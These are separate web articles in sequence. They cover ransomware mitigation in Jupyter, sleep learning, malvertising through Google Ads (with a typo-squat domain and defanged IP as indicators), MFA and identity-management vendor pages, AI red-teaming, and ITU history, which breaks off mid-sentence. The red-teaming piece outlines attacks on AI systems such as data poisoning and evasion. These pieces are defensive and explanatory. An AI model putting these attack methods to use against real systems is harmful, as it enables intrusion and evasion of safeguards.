‘./root/.local/share/jupyter/nbsignatures.db’. If SSH access to the server is enabled, you can also inspect the SSH authorized keys files to verify that you’re familiar with all the keys and that there are no unknown users or keys. General security recommendations - Back up critical business systems regularly and consistently to avoid data loss. - Apply the least-privilege access principle throughout your environment. - Follow basic cybersecurity hygiene, which is fundamental to avoiding security gaps that employees might accidentally leave — for example, missing patches and default passwords. - Make sure your IT and security staff are staying vigilant and keeping watch, and that they’re prepared to work diligently to protect customers, processes, and systems. Recommendations for cloud native environments - Identify exposures, vulnerabilities, and misconfigurations that can provide entry points for attackers to gain access and compromise networks. - Scan all your running workloads for critical vulnerabilities with known exploits to conduct focused patching and mitigation. You can use trusted open source scanners such as Trivy. - Scan for vulnerabilities in CI/CD pipelines to ensure that no new vulnerabilities are introduced. - Scan your workloads for suspicious and malicious behavior in runtime with open source tools such as Tracee.
<urn:uuid:0c5ab3ef-efbf-43c6-bfb9-f6fcb4cd3d63>
CC-MAIN-2024-38
https://www.aquasec.com/blog/python-ransomware-jupyter-notebook/
2024-09-15T09:49:39Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651622.79/warc/CC-MAIN-20240915084859-20240915114859-00212.warc.gz
en
0.934682
1,417
2.796875
3
Sleeping is sometimes considered unproductive time. Could the time spent asleep could be used more productively—e.g., for learning a new language? To date, sleep research has focused on the stabilization and consolidation of memories formed during wakefulness. However, learning during sleep has rarely been examined. There is considerable evidence for a recapitulation by replay in the sleeping brain of wake-learned information. The replay during sleep strengthens the still fragile memory traces and embeds the newly acquired information in the preexisting store of knowledge. If replay during sleep improves the storage of wake-learned information, then the initial processing of new information should also be feasible during sleep, potentially carving out a memory trace that lasts into wakefulness. This was the research question of Katharina Henke, Marc Züst and Simon Ruch at the University of Bern, Switzerland. These investigators show for the first time that new foreign words and their translations could be associated during a midday nap with associations stored into wakefulness. Following waking, participants could reactivate the sleep-formed associations to access word meanings when represented with the formerly sleep-played foreign words. The hippocampus, a brain structure essential for wake-associative learning, also supported the retrieval of sleep-formed associations. The results of this experiment are published open access in the scientific journal Current Biology. The research group examined whether a sleeping person is able to form new semantic associations between played foreign words and translation words during the brain cells’ active states, the so-called “up-states.” When we reach deep sleep stages, our brain cells progressively coordinate their activity. During deep sleep, the brain cells are commonly active for a brief period of time before they jointly enter into a state of brief inactivity. The active state is called up-state and the inactive state down-state. The two states alternate about every half-second. Semantic associations between sleep-played words of an artificial language and their German translations words were only encoded and stored if the second word of a pair was repeatedly played (two, three or four times) during an up-state. E.g., when a sleeping person heard the word pairs “tofer = key” and “guga = elephant,” then after waking, they were able to categorize with better-than-chance accuracy whether the sleep-played foreign words denominated something large (“Guga”) or small (“Tofer”). “It was interesting that language areas of the brain and the hippocampus—the brain’s essential memory hub—were activated during the wake retrieval of sleep-learned vocabulary, because these brain structures normally mediate wake learning of new vocabulary,” says Marc Züst, co-author of the paper. “These brain structures appear to mediate memory formation independently of the prevailing state of consciousness—unconscious during deep sleep, conscious during wakefulness.” Besides its practical relevance, this new evidence for sleep learning challenges current theories of sleep and theories of memory. The notion of sleep as an encapsulated mental state in which we are detached from the physical environment is no longer tenable. “We could disprove the idea that sophisticated learning is impossible during deep sleep,” says Simon Ruch, co-author. The current results underscore a new theoretical notion of the relationship between memory and consciousness that Katharina Henke published in 2010 (Nature Reviews Neuroscience). “In how far and with what consequences deep sleep can be utilized for the acquisition of new information will be a topic of research in upcoming years,” says Katharina Henke. More information: Current Biology (2019). DOI: 10.1016/j.cub.2018.12.038 Katharina Henke. A model for memory systems based on processing modes rather than consciousness, Nature Reviews Neuroscience (2010). DOI: 10.1038/nrn2850 Provided by University of Bern
<urn:uuid:7ac2df27-1e92-4ab6-9284-24bb62721017>
CC-MAIN-2024-38
https://debuglies.com/2019/01/31/new-theoretical-notion-of-the-relationship-between-memory-and-consciousness/
2024-09-16T15:10:16Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651697.45/warc/CC-MAIN-20240916144317-20240916174317-00112.warc.gz
en
0.948988
840
3.671875
4
Creator: University of Pennsylvania Category: Software > Computer Software > Educational Software Topic: Health, Psychology Tag: applications, hypothesis, internal, research, study Availability: In stock Price: USD 99.00 Learners discover how apply to research methods to their study of Positive Psychology. Interested in what the future will bring? Download our 2024 Technology Trends eBook for free. In this course, we study with Dr. Angela Duckworth and Dr. Claire Robertson-Kraft. Through an exploration their work “True Grit” and interviews with researchers and practitioners, you develop a research hypothesis and learn how to understand the difference between internal and external validity. You also begin to understand and apply the strengths and weaknesses associated with different types of measurements and evaluation designs. You then interpret the results in an empirical study. Suggested prerequisites: Positive Psychology: Martin E. P. Seligman's Visionary Science and Positive Psychology: Applications and Interventions.
<urn:uuid:335bcd5a-907d-422e-ad38-041ff03af1f1>
CC-MAIN-2024-38
https://datafloq.com/course/positive-psychology-character-grit-and-research-methods/
2024-09-08T07:03:26Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650960.90/warc/CC-MAIN-20240908052321-20240908082321-00012.warc.gz
en
0.884843
199
2.75
3
In the sprawling extent of the internet, Google Ads has become a beacon for businesses looking for a digital presence. Its ability to connect products and services with prospective customers is unrivaled. However, the exact mechanisms intended to foster commercial success have been hijacked by threat actors. These attackers use Google Ads to conduct malvertising and phishing campaigns, skillfully concealing risks behind seemingly genuine ads. This hidden underworld of digital advertising endangers unknowing individuals while jeopardizing internet platforms’ integrity. As we work through the complexities of these deceptive activities, it’s critical to grasp the implications for both individual security and the larger internet ecosystem. What is Malvertising? Malvertising, an acronym for “malicious advertising,” is the practice of injecting malware into digital advertisements. Cybercriminals can disguise their malware as legitimate commercials using platforms such as Google Ads thanks to its broad reach and sophisticated targeting capabilities. These advertisements appear on trustworthy websites without the site owner’s knowledge or that of the advertising network. When users click on these advertisements, they are unknowingly exposed to malware, which can result in data theft, ransomware, and other cyber risks. Malvertising with Google Ads works by having a threat actor create an advertisement that appears benign on the surface. This advertisement, however, has malicious code or malicious laced files/pdf’s/APK’s. When accepted, the ad is displayed throughout Google’s extensive advertising network, including websites, videos, and apps that millions of people trust and use daily, thus leading to privacy invasion, potential identity theft, and the compromise of personal devices and personal identifiable information (PII). The researchers at Bolster found a pattern on the CheckPhish platform, where multiple brands were targeted by misusing Google Ads to make the user click on their website/link instead of the legitimate website. How it Works Cybercriminals are taking advantage of Google’s advertising network by purchasing advertisement spaces for frequently searched keywords and related misspellings. (It is common for consumers to run a search engine query and perform a quick search for a desired website without typing the full URL.) Users frequently click on the first link displayed in the search results, regardless of whether it is an advertisement or an organic ranking. Keyword Hijacking: Advertisers buy advertising for popular keywords and common misspellings to target visitors looking for legitimate services or products. Ad Content Mimicry: Malicious ads closely resemble genuine ads’ graphic and content styles, deceiving consumers into believing they are clicking on a trustworthy link. Malicious Landing Pages: When users click on the ad, they are directed to landing pages that may include malware, collect personal information, or deceive them into fraudulent transactions. Use of Redirects: To avoid detection, these campaigns frequently use several redirections, taking the user through several domains before arriving at the ultimate malicious website. Exploiting Trust in Google’s Platform: By utilizing the credibility associated with Google Ads, attackers obtain a sense of legitimacy, increasing the effectiveness of their malvertising efforts. An example of amazan[.]com is demonstrated below, which leads to downloading and installing a fastblock application having a serving IP of 178[.]128[.]246[.]195. Numerous brands, including but not limited to Amazon, Adidas, Notion, and Weebly, have been targeted in malvertising campaigns aimed to deceive unwary consumers. An example comparison of how Adidas has been impacted is shown below. As noted here, “A growing body of evidence from industry, MITRE, and government experimentation confirms that collecting and filtering data based on knowledge of adversary tactics, techniques, and procedures (TTPs) is an effective method for detecting malicious activity” Said differently, understanding the tactics and techniques is critical for creating strong security measures and preventing potential threats. The Mitre TTP is given below: ID | Tactic | Technique | Procedure | T1583.008 | Resource Development | Acquire Infrastructure: Malvertising | Spoofed adverts might mislead users into clicking on them, which may subsequently redirect them to a malicious domain that is a clone of legitimate ones carrying trojanized versions of the advertised software. | T1189 | Initial Access | Drive-by Compromise | T1608.004 | Resource Development | Stage Capabilities: Drive-by Target | Adversaries may set up an operating environment to infect systems that visit a website during routine browsing. Endpoint systems may be hacked by surfing to adversary-controlled websites. | Impact & Mitigation Impact | Mitigation | Malvertising through Google Ads can increase the frequency of security breaches, exposing sensitive user and corporate data to unauthorized access. | Report fake ads on the following websites: Facebook: Support Page Instagram: Support Page Google: Support Page | Loss of trust and reputation, financial loss. | Use ad-blocking software to keep fraudulent advertisements from being displayed. | Though advantageous, the swift shift to digital platforms presents numerous prospects for cybercriminals skilled in taking advantage of weaknesses for malicious advertising operations. These deceptive efforts provide an outlet for the stealthy collection of sensitive information, posing significant hazards to individuals and businesses. Malvertising is a more subtle threat, collecting and distributing personal and financial information without detection and frequently overcoming traditional security measures. Proactive investigation and vigilant monitoring are critical for detecting and limiting the efforts of individuals behind malvertising campaigns, especially when new methods of attack arise. Our analysis emphasizes the significance of maintaining ongoing monitoring and developing forward-thinking measures to combat these dangers. Bolster’s anti-phishing and domain monitoring technology protects your business from evolving phishing threats. With continuous scanning technology that quickly identifies threats and misuse of your branded assets, you can trust Bolster will protect your business. See Bolster in action when you request a demo.
<urn:uuid:c5e3aac9-1f86-42b2-a77f-84af53e38389>
CC-MAIN-2024-38
https://bolster.ai/blog/malvertising-campaigns
2024-09-09T09:10:10Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651092.31/warc/CC-MAIN-20240909071529-20240909101529-00812.warc.gz
en
0.903248
1,218
2.890625
3
Spread the loveMulti-Factor Authentication, similar to Two-Factor Authentication, is a way to further protect you, your business, and employees from the threats of cybercrime. With the ever-rising rate of hacking and and data breaches, it’s more crucial than ever to safeguard your sensitive information. It’s no longer enough to just have a strong password. This Spread the love Multi-Factor Authentication, similar to Two-Factor Authentication, is a way to further protect you, your business, and employees from the threats of cybercrime. With the ever-rising rate of hacking and and data breaches, it’s more crucial than ever to safeguard your sensitive information. It’s no longer enough to just have a strong password. This is where MFA comes into play. Let’s break it down: What is Multi-Factor Authentication? MFA is a second layer of security that you can use for your email logins, device logins, and many other places that you store sensitive information. It’s usually broken down into three concepts: Things you know (knowledge), such as a password or PIN Things you have (possession), such as a badge or smartphone Things you are (inheritance), indicated through biometrics, like fingerprints or voice recognition¹ The combinations of the three above concepts work to create a more personalized layer of security for your devices. You may have seen these in use when you forget your email password and Google or Yahoo sends you an authentication code via text to your phone, or if you have the newer iPhone, they use biometrics like facial recognition to make sure it’s really you, and not just someone who has your passcode. Those examples above help you in your personal life, but what about your work life? Often times it’s not only your personal information at risk when you or your whole business gets hacked. All of your coworkers and your clients get affected as well. Too many times we see breaches that could have been prevented if something as simple as multi-factor authentication was implemented. The main idea of Multi-factor Authentication is to force hackers or bad actors to work harder to gain access to your data in the event that they get your password through breaches of other companies like Yahoo!, or Google. When they try to log into your account they will be forced to prove who they are through Multi-factor Authentication and they won’t have that additional access to your device to log in. How Do I Use It? MFA is simple to use. There’s multiple options to choose from such as text verification, phone calls, and the Microsoft Authenticator app. Based on your settings, when you log into an Office 365 application you’ll be asked to enter a 6 digit code to verify your login. Hereis a document explaining the setup process. After you enable MFA you may be prompted to log in and authenticate some of your accounts again. Most Microsoft products fall under this requirement including your Desktop Outlook, One Drive for Business, Teams, Sharepoint, and the Office 365 Portal (For OWA or any other Office 365 Features). How Do I Get MFA? Is the fear of a data breach on your mind lately? The good news is that if you have Office 365, you likely already have access to Multi-Factor Authentication. If you’re interested in MFA, call us at (201) 796-0404 and we’d be happy to set it up for you. Information Technology Aligned With Your Business Goals? Baroan is a complete IT services & IT support company working with organizations in Elmwood Park and across the United States of America. When it comes to IT services and solutions, you need someone who not only comprehends the IT industry but is also passionate about helping clients achieve long-term growth using proven IT solutions. Guy, in leading our company, is committed to helping clients improve their technology in order to develop a competitive edge in their industries. At Baroan Technologies, Guy Baroan leads a team of dedicated professionals who are committed to delivering exceptional IT services and solutions. With his extensive expertise and hands-on experience, Guy ensures that clients receive the utmost support and guidance in their IT endeavors. Trust in Baroan Technologies to elevate your business systems and stay ahead in today’s competitive landscape.
<urn:uuid:47fb5a21-bb2d-4b35-9c7b-d2e5be2d812d>
CC-MAIN-2024-38
https://www.baroan.com/what-is-multi-factor-authentication-mfa/
2024-09-11T21:04:32Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651400.96/warc/CC-MAIN-20240911183926-20240911213926-00612.warc.gz
en
0.936026
904
2.609375
3
Cybersecurity has come a long way in the past two decades. So much so that proper identity management practices have become a basis for strong cybersecurity systems. In short, you always have to make sure that everyone is who they claim to be when requesting access. Equally as important, you should be certain that they are allowed to access what they’re requesting. With this in mind, choosing a specific identity management approach can be challenging, especially when dealing with enterprise identity management solutions. So, to help you make sure you pick the most suitable identity management policy, we’ll cover everything you need to know about this extensive topic, all in one place. What is Identity Management? Identity management(IdM), also known as identity and access management (IAM) is often defined as a system used by IT departments to initiate, store, and manage user identities and access permissions. IAM includes two important processes: authentication and authorization. In simple terms, authentication answers who you are by matching your login and password with your record in a database. Authorization checks what access and permissions you have. So, the identity and access management system is there to prevent any unauthorized access and raise alarms whenever an unauthorized user or program makes an access attempt. Additionally, it’s important to differentiate Identity Management and Access Management. The easiest way to do so is to remember that Identity Management is all about managing different attributes related to a user, a group of users, or any other entity that requires access. On the other hand, Access Management is about evaluating these attributes and giving a positive or negative access decision based on them. IAM methodology ensures that users have access to the assets they need, like systems, infrastructure, software, information, but the assets are not accessible by unauthorized users. The key to secure identity management and access control lies in the combination of strong credentials, appropriate permissions, specified assets, and the right context. Identity and access management policies and procedures are developed with the principal idea in mind - prevent exposure of sensitive data. Identity and Access Management Concepts Identity and access management solutions, likeHideez Authentication Service, typically consist of the following fundamental elements: - an identity repository with personal data used by the system to identify users; - access lifecycle management tools (used to add, modify, update or delete that data); - an access regulation system that enforces security policies and access privileges; - a report and audit system that monitors activity in the overall system. Identity access management tools can include automatic provisioning software, password managers, security-policy enforcement applications, monitoring apps, multi-factor authentication, single sign-on, and more. With the advancement of technologies and an increased number of data breaches, it takes more than a strong login and password to protect an account. That’s why more and more IAM solutions use biometrics, physical tokens, machine learning, and artificial intelligence in their systems. Identity Management Use Cases User identity management User identities are managed by the IAM solution. The IAM may integrate with existing directories’ identity management roles, synchronize with them, or be the one source of truth. In any case, an id management system is used to create, modify, and delete users. User provisioning and de-provisioning An IT department is responsible for user provisioning. They need to enter new users into the system and specify what apps, software, sites, directories, and other resources they can access. It is essential to define what level of access (administrator, editor, viewer) every individual user has to each of them. To simplify the process, the IT department can use role-based access control (RBAC). This way, when a user is assigned one or more roles, he or she automatically gets access as defined by that role. De-provisioning is also a critical IAM component. When done manually, it can result in delayed action and unintended disclosure. Hideez Enterprise server automates the process and immediately de-provision ex-employees. IAM systems authenticate a user when the user requests access. A common standard is to use multi-factor authentication to ensure stronger protection and a better ID management system overall. Based on user provisioning, an IAM system authorizes user access to the requested resource if the credentials match the records in the database. To help companies comply with regulations, identify security risks, and improve internal processes, IAM provides reports and dashboards to monitor the situation. Single Sign-On (SSO) SSO is one of the best examples of modern and sophisticated identity management use cases. Only the best IAM systems like Hideez include SSO in their solution. SSO is an extra level of security that makes access for the end-user much faster, as it allows the user to use multiple resources without an additional login. Benefits of Identity and Access Management Enterprise identity management solutions bring about a long list of proven advantages. By implementing an access control and identity management solution, a company can gain the following identity management benefits: - More Robust Security - Proper identity management gives companies greater control of user access and reduces the risk of a data breach. IAM systems can reliably authenticate and authorize users based on their access credentials and access levels in their directory profiles. - Quick and Easy Access - Access is provided based on a single interpretation of the existing policy. This allows for easy access no matter where you’re trying to access from. This is a huge game-changer, as it eliminates the user’s physical location as any factor. - Stronger and More Streamlined Internal Systems - IAM also strengthens internal policy compliance and reduces financial, labor, and time resources needed for this end. - Increased Productivity - Automated IAM systems boost employee productivity by decreasing the effort, time, and money required to manage the IAM tasks manually. Simultaneously, this streamlined enterprise identity access management system saves on IT costs, as internal help desks won’t be as busy as before. - Simplified Reporting and Auditing Processes - IAM assists companies in compliance with governmental regulations, as they incorporate the necessary measures and provide on-demand reports for the audit. Identity Management for Stronger Compliance As more attention and media exposure is given to the issue of data privacy, the government and regulatory bodies introduced multiple acts and regulations to protect client and business data. Here are the most important ones that hold companies accountable for controlling access to sensitive user information: - PCI DSS - The Payment Card Industry Data Security Standard is a widely accepted standard for credit card companies. In the context of identity management and access management, PCI DSS can help enterprises regulate this vital financial sector. - PSD2 - The PSD2 is a payment directive that brings great innovations into the online banking world, primarily in the form of more potent and better authentication. - HIPAA - This is a significant identity management policy, as it established nationwide rules and standards for processing electronic healthcare transactions. - GDPR - The General Data Protection Regulation has been in effect since 2018 and is currently one of the primary legislation pieces aiming to consolidate data protection across all EU member states. - CPRA - The California Consumer Privacy Act is the first significant privacy law in the US that focuses on consumer control of personal data. - Sarbanes-Oxley - The SOX identity and access management security standard applies to banking, financial services, and insurance industries. - Gramm-Leach-Bliley - Also known as GBLA, this is a federal law that mandates that all financial institutions must maintain the confidentiality of non-public customer data. Moreover, it requires institutions to protect against threats to this information. Identity management systems can significantly reduce the risk of breaching those regulations. Given the cost of negative audit results for the business, compliance should be a top priority for every IT department in companies subject to the before-mentioned regulations. Enterprise Identity Management Solutions by Hideez Choosing the right identity management products can make a world of difference in both usability and security. At Hideez Group, we’ve rolled out a new version of our acclaimed Enterprise server. It enables passwordless access with various types of FIDO authenticators. The main components of the Hideez Authentication Service are: - Hideez Enterprise Server - A FIDO/WebAuthn server and SAML 2.0 Identity Provider. It’s a very capable server that delivers passwordless FIDO2 authentication and FIDO U2F across corporate applications and websites. - Hideez Client Software - A streamlined application that confirms authorization and connection, and enables hotkeys for entering credentials. - Hideez Authenticator - A mobile application that provides fast and secure access to coporate apps and web services with mobile identification. Employees can use biometric verification or scan a unique QR code to sign in to their accounts; - Hideez Security Keys or other hardware/software authenticators - You can use your own authentication tools depending on your needs. We recommend using multifunctional security keys, the Hideez Key 3 or the Hideez Key 4 to ensure the maximum convenience and security of all end users, but you can do without them. The Hideez enterprise identity management solution brings about a long list of benefits. It’s an all-in-one solution that enables straightforward password control without the need to disclose any credentials. It prevents phishing attacks and minimizes the risk of human error, in return ensuring better business continuity without any disruptions. If you’re looking for reliable IAM enterprise solutions and want to go truly passwordless, get access to the Hideez Server demo version absolutely for free by contacting us right away!
<urn:uuid:4b04cc77-dc85-4564-8569-bbb4452e83d4>
CC-MAIN-2024-38
https://hideez.com/blogs/news/identity-and-access-management
2024-09-16T19:18:21Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651710.86/warc/CC-MAIN-20240916180320-20240916210320-00212.warc.gz
en
0.907054
2,016
2.59375
3
What is "AI red-teaming"? Defining a process into the recently discussed practice of AI red-teaming As many are now aware, the White House released its “Executive Order on the Safe, Secure, and Trustworthy Development and Use of Artificial Intelligence” this week. The goal of this Executive Order (EO) is to encourage the development and use of AI safely and responsibly and ultimately that “artificial Intelligence must be safe and secure”. Over the next few weeks and months, the White House, the National Institutes of Standards and Technology (NIST), the Department of Homeland Security (DHS), and other government institutions will be working diligently to further the guidance and directives laid out in the EO. In the meantime, there are several items in the EO that can be more clearly defined for the public. The goal of this article is to examine the term and practice of “AI red-teaming” mentioned throughout and defined in the EO as “a structured testing effort to find flaws and vulnerabilities in an AI system, often in a controlled environment and collaboration with developers of AI” in section 3(d). The EO definition continues to explain that “artificial Intelligence red-teaming is most often performed by dedicated ‘red teams’ that adopt adversarial methods to identify flaws and vulnerabilities, such as harmful or discriminatory outputs from an AI system, unforeseen or undesirable system behaviors, limitations, or potential risks associated with the misuse of the system.” What is AI red-teaming? The concept of red-teaming in general is not new. Cybersecurity professionals have been using red-teaming for the last two decades as part of their standard practices for understanding vulnerabilities in an organization’s cyber infrastructure. These traditional cyber red teams typically have the following attributes : - Security professionals who act as adversaries to overcome cyber security controls - Utilize all the available techniques to find weaknesses in people, processes, and technology to gain unauthorized access to assets - Make recommendations and plans on how to strengthen an organization’s security posture In a complementary role to traditional cyber red teams, AI red teams have the following attributes: - AI security professionals with varying backgrounds (including traditional cybersecurity professionals, AI practitioners, adversarial ML experts, etc.) who act as adversaries to discover vulnerabilities in AI-enabled systems - Utilize all the available techniques to find weaknesses in people, processes, and technology to gain unauthorized access to AI-enabled systems - Make recommendations and plans on how to strengthen an organization’s AI security posture While the attributes of both approaches appear similar, AI poses unique security vulnerabilities not covered by traditional cybersecurity, such as data poisoning, membership inference, and model evasion . Therefore, the mission and execution of the AI red-teaming approach are also unique. We define the AI red-teaming process in a three-phase approach in the following manner. How does AI red-teaming work? In the first phase, the focus of the AI red team is to stand up the team by recruiting the right talent for the red-teaming exercise and utilizing and building the necessary tools that will be needed. Depending on the AI system being red-teamed, the members of the team may include traditional cybersecurity professionals, adversarial machine learning experts, operational and domain experts, and AI practitioners. Once the team is stood up and the AI red-teaming mission has been identified, phase two, or the execution phase, of the AI red-teaming process begins. This may be broken up into five main steps: - Analyze the target system to gain as much as possible and as needed to perform the AI red-teaming exercise. This may include building threat models, performing information gathering on the system and mission, and utilizing openly available knowledgebases of known attacks, such as MITRE ATLAS . - Identify and potentially access the target system and AI model or component of the system that will be attacked. In some cases, access to the system will be very difficult, so a “black-box” approach will be needed to carry out the attack, which might involve building a proxy system or model for the target system. - Once the threat model, target system, and AI model have been identified and understood, develop the attack. For example, if the target system is a surveillance system and the threat model is to evade detection from the AI model performing face recognition, the development of the attack will focus on face recognition evasion attacks. - Once one or more attacks have been developed for the AI red team exercise, deploy and launch the attack on the target system. The type of deployment may vary widely depending on the target system and threat model. - Perform impact analysis of the attack. This analysis will include metrics from the individual model performance of the affected AI components but should also include higher-level metrics to understand the effect of the attack on the overall system and/or mission under attack. The final phase of the AI red-teaming process is the knowledge-sharing phase. In this phase, lessons learned and recommendations are shared with the development teams, blue teams, and any stakeholders involved in securing the AI systems of the organization or mission involved in the exercise. Additionally, results from the exercise might be shared with auditors, the broader AI security community, and incidence-sharing mechanisms to further knowledge and understanding of AI security risks to the broader community. How do you get started? Given the relative nascence of AI red-teaming, it may seem daunting to know where to start. Consider the following initial steps to get started with red-teaming against your organization’s high stakes AI systems: - Discover your organization’s AI systems in development, in deployment, and in the supply chain - Identify the use case that carries the most risk in the event of an adversarial security attack, as well as the key stakeholders responsible for maintaining the operations and security of the AI system(s) - Get leadership buy-in by showcasing the potential value-add/risk reduction of the red-teaming activities For more information, connect with me and follow Cranium on Linkedin for the latest in AI red-teaming!
<urn:uuid:96c8c410-79fa-49bc-8f4e-2486a8dee1d5>
CC-MAIN-2024-38
https://cranium.ai/resources/blog/what-is-ai-red-teaming/
2024-09-18T02:26:35Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651835.68/warc/CC-MAIN-20240918000844-20240918030844-00112.warc.gz
en
0.947929
1,289
2.875
3
The what, where, when and how of the cloud are persistent questions that must be answered correctly if a cloud deployment is to be successful. But, misconceptions can be handicaps and organisations often labour under a number of misconceptions. A little understanding of cloud architectures, management and chargeback can be useful in selecting the best fit solution to their needs. Managing and using different cloud architectures The cloud has evolved from the convergence of a number of technologies and approaches to computing. The underlying architecture is similar to and different from existing computing models and impacts on the operational and technological approaches to network configurations and security practises. Like all computing systems operating over a network, the cloud consists of a back end [the remote server(s)] and a front end (the client computers). The connecting network is the Internet. The servers, the applications and the storage devices at the backend provide a cloud of services to the customers. Cloud computing systems that cater to multiple clients are known as “public” clouds. When an entire cloud service system is dedicated to a single client, it is known as a “private” cloud. Hybrid clouds combine features of the public and private clouds. The client machines connect to the remote server(s) and the applications using software called an “agent”. The agent is a special kind of software, known as middleware. It enables IT Administrators monitor traffic, administer the system and set rules and regulations for access and use of the information stores available in the remote server. “Utility computing” is the unique selling point (USP) of the cloud. Organisations signing up for cloud services agree that the cloud makes it easier for the organisation to track and measure IT expenses per business unit. Chargeback becomes simpler as it is metered like electricity on a “pay per use” basis. Chargeback mechanisms in the cloud take into consideration two factors: What are the resources and metrics for chargeback? How to account for excess capacity that is supplied on the fly? The chargeback system is built on the assumption that customers tend to use average capacity rather than large capacity and hence offering scalable services does not automatically result in extensive usage of resources. Further, cloud vendors understand that successful chargeback systems separate infrastructure costs from service costs and that shared infrastructure is a combination of fixed and variable costs in which the percentage of fixed costs will decrease as number of users increase. Pricing will consequently, be, unit tiered; bundled or pay per use.
<urn:uuid:8b234874-0eca-4400-a0e9-f5f1da987f58>
CC-MAIN-2024-38
https://blog.backup-technology.com/14609/understanding-architecture-management-chargeback-issues/
2024-09-20T10:51:12Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652246.93/warc/CC-MAIN-20240920090502-20240920120502-00812.warc.gz
en
0.932705
509
2.71875
3
The International Telecommunication Union recently began a well-deserved celebration of one of the real success stories in international cooperation—the 110th anniversary of the Radio Regulations as a treaty instrument. An ITU publication describes the historical highlights. Global cooperation among governments in managing radio spectrum via the Radio Regulations has been generally regarded as essential from the outset in the early years of the 20th Century and remains so today. Over the decades, the work has been almost universally supported and constitutes the largest of the ITU activities among governments and industry. A part of that history that is almost unknown, however, is how Warren G. Harding’s election as President almost a hundred years ago killed off the ongoing efforts to establish the ITU as a means of international multilateral cooperation—together with the Radio Regulations. Harding is widely regarded as perhaps the worst U.S. president in its history, and his term of office was marked by crony capitalism scandals and disastrous decisions on multiple levels. Today there are many eerie parallels to the election of Donald Trump as he strives to exceed Harding’s notorious status as the worst. The interesting question over the coming months is whether Harding’s mistakes in international telecommunication history will be repeated by Trump. Woodrow Wilson’s international telecommunication cooperation vision Wilson’s effort to create the League of Nations is well known and there are memorials all over Geneva to that vision. Almost unknown was an independent initiative to bring about a visionary “Universal Electrical Communications Union” and foster global communications “for the entire world” which occurred at about the same time and has remained essentially invisible. One hundred years ago, there was no actual ITU—only a relatively static Telegraph treaty that included telephony, an outdated Radiotelegraph treaty, and a small secretariat in Bern that separately attended to both sets of signatories and their occasional plenipotentiary meetings. There were enormous developments in telecommunication technology during World War One—especially relating to radio. A group of visionaries in the Wilson administration and a few foreign counterparts pursued a new effort starting with the EU[États-Unis]-F-GB-I Radiotelegraphic Commission in Paris meeting on a warm summer day in August 1919 to produce the basis for new Radio Regulations. The success of the cooperation led Wilson a few weeks later to request the U.S. Congress approve hosting a major international conference in Washington: to consider all international aspects of communication by land telegraphs, cables, and wireless telegraphy and to make recommendations to the powers concerned with a view to providing the entire world with adequate facilities of this nature on a fair and equitable basis. It is at this point that the visionary leader for the effort in the Wilson Administration emerges in the person of Walter S. Rogers—a senior official in his State Department. Rogers also was the special advisor to the Peace Conference at Paris among 27 nations in January 1919 on matters relating to international communication. The Conference was largely controlled by U.S., Britain, France, Italy, and Japan which produced many agreements including the creation of the League of Nations. What was effectively the first Plenipotentiary Conference of the Electrical Communications Union met in Washington DC in December 1920—preceded by a smaller sub-committee meeting in September to further consider the 1919 draft Radio Regulation provisions. After considerable work over many weeks, it produced a draft Convention for the creation of a Universal Electrical Communications Union with Telegraph and Radio Regulations. One of the entities created was an International Technical Radiotelegraph and Visual Committee (CIRV) charged with “giving advice on all problems concerning radiotelegraphy and visual and sound signaling.” It was a fascinating period of cooperation and innovation that led to a draft Convention that integrated the separate radio and telecommunication regimes and produced fully developed Radio Regulations. Harding replaces Wilson and kills all international cooperation An admitted know-nothing Republican candidate - Warren G. Harding—by chance was nominated in 1920 and elected President on the slogan “A Return to Normalcy.” Much like what is occurring now in the U.S., one of America’s most visionary Presidents - Wilson - was replaced by an ignorant, incompetent man who saw his role as the modern day equivalent of a reality show and admitted he knew nothing about the subject matter. Harding brought with him crazies intent on overturning everything Wilson had been doing, destroying the environment, introducing ultra-free market policies, and ceasing international cooperation. To run the government, he surrounded himself with dishonest cheats, who came to be known as “the Ohio gang.” Many of them were later charged with defrauding the government, and some of them went to jail. Harding knew little about foreign affairs when he assumed office and gave his Secretary of State a free hand to secure foreign markets for wealthy contributors to his campaign. Harding took office 4 March 1921. Eleven weeks later at the Commodore Hotel in New York City, one of the more notorious meetings in international telecommunications history unfolded where Walter S. Rogers was grilled for two days by friends of the new Harding Administration on the efforts to create a new International Communications Union organization and Radio Regulations. Still, at the State Department, he was essentially made to repent for his visionary efforts, and it was made plain that all international cooperation efforts would cease. If not for a 311-page transcript of the meeting that Rogers tucked away in the U.S. archives marked “confidential,” no one would have known what occurred. Although Harding was never linked to any crooked deals, the public was aware of his affairs with at least two women, one of whom was a German sympathizer during the war- who tried to blackmail Harding and was paid hush money by the Republican Party. Another mistress 30 years younger than Harding was given a job that enabled liaisons in the Oval Office that resulted in his fathering her child. As scandals unfolded, and Harding’s appointees began going to jail, he succumbed to a heart attack at 57 after being in office only 2 ½ years. It would not stop there, as the economic policies that Harding set in motion ultimately gave rise to the Great Depression, destruction of the environment, and internationally facilitated the Third Reich and Adolf Hitler. Walter S. Rogers’ subsequent history is unknown. After the Commodore Hotel incident and having his vision belittled, he wrote a sage albeit a poignant set of reflections published in Foreign Affairs. His admonition seems as appropriate today as it was in 1922: To what extent, under the circumstances, the American Government should participate in general international communications conferences is a question that concerns not only the United States but the other countries as well. Without taking a new tack the United States certainly can not participate in limited international arrangements looking toward the joint provision, by the countries immediately concerned, of new facilities or the joint regulation of rates of services provided by commercial enterprises. Though it is not apparent that Rogers ever participated in an international communications meeting again, the value of his work and his vision as Wilson’s emissary was blessed by history. After a long, dark hiatus of U.S. international telecommunications cooperation, Herbert Hoover as U.S. Commerce Secretary found the work on the Radio Regulations compelling. He called the 1927 Radio Conference in Washington using the work done six years earlier as its basis and it produced the Radio Regulations and Consultative Committee activities that still exist today. The work on the Convention for an integrated cooperative international organization was picked up in 1932 at the Madrid Conference and became the basis for the International Telecommunication Union coming into existence in 1934 and its treaty instruments enduring as the basis for cooperation among all nations. Although Trump’s pronouncements on international telecommunication cooperation remain unknown, the views and approaches espoused thus far give cause for great 